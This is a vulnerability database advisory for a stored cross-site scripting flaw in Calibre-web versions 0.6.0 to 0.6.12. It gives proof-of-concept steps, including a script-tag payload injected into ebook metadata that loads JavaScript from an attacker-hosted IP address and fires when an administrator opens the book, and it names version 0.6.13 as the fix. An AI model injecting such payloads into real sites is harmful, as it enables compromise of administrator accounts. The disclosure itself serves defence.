WhiteSource Vulnerability Database
What is a CVE vulnerability ID? What is a WS vulnerability ID?New vulnerability? Tell us about it!
We found results for “”
Date: October 4, 2021
PoC DetailsFor demonstration purposes, we will use two users:
1. Alice, a low privileged user.
2. Admin, an administrator user.
Login into the application as Alice and open any ebook. Click on Edit Metadata. Now, click on save and intercept the request. Observe the parameter “description”, the content of it is sent inside HTML tags. Now inject the below payload immediately after the HTML tag and forward the request. The injected payload is saved in the file's metadata.
Login into application as Admin (victim). Now click on the ebook available on the dashboard, and notice the payload being triggered.
// Injected payload after the description parameter <p>calibre Quick Start Guide</p><script src=http://192168.0.105:4444/xss.js></script> // Contents of xss.js file hosted on the attacker’s server: alert(“XSS”);
Affected EnvironmentsCalibre-web versions v0.6.0 to v0.6.12
PreventionUpdate to calibreweb version 0.6.13
Good to know:
|Attack Vector (AV):||Network|
|Attack Complexity (AC):||Low|
|Privilegs Required (PR):||Low|
|User Interaction (UI):||Required|
|Access Vector (AV):||Network|
|Access Complexity (AC):||Medium|